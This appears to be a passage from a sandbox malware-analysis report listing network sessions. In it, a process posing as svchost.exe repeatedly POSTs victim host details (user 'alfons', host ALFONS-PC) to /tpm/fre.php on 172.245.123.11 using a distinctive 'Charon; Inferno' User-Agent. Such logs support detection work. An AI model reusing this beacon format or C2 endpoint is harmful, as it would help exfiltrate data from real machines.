                                                              Jan 7, 2025 11:02:39.253199100 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:39.258110046 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:39.771805048 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:39 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              62192.168.2.549926172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:39.967674017 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:39.972589970 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:40.445399046 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:40 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              63192.168.2.549932172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:40.630846977 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:40.635703087 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:41.133944035 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:41 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              64192.168.2.549934172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:41.298851967 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:41.303821087 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:41.803622007 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:41 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              65192.168.2.549940172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:41.962018013 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:41.967236996 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:42.460005999 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:42 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              66192.168.2.549946172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:42.619941950 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:42.625052929 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:43.145533085 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:43 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              67192.168.2.549952172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:43.358571053 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:43.363394022 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:43.852346897 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:43 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              68192.168.2.549958172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:44.014785051 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:44.019633055 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:44.522228003 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:44 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              69192.168.2.549964172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:44.679044962 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:44.684154034 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:45.349988937 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:45 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              70192.168.2.549969172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:45.502561092 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:45.507464886 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:46.029906034 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:45 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              71192.168.2.549971172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:46.175299883 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:46.180114985 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:46.699381113 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:46 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              72192.168.2.549976172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:46.846402884 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:46.851221085 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:47.374459028 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:47 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              73192.168.2.549982172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:47.790219069 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:47.795110941 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:48.292709112 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:48 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              74192.168.2.549987172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:48.446213007 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:48.451009035 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:49.000181913 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:48 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              75192.168.2.549994172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:49.145272017 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:49.150118113 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:49.647380114 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:49 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              76192.168.2.550000172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:49.802108049 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:49.806912899 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:50.327389956 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:50 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              77192.168.2.550006172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:50.475929022 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:50.480746031 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:51.066351891 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:50 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              78192.168.2.550009172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:51.206149101 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:51.210959911 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:51.758467913 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:51 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              79192.168.2.550015172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:51.911526918 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
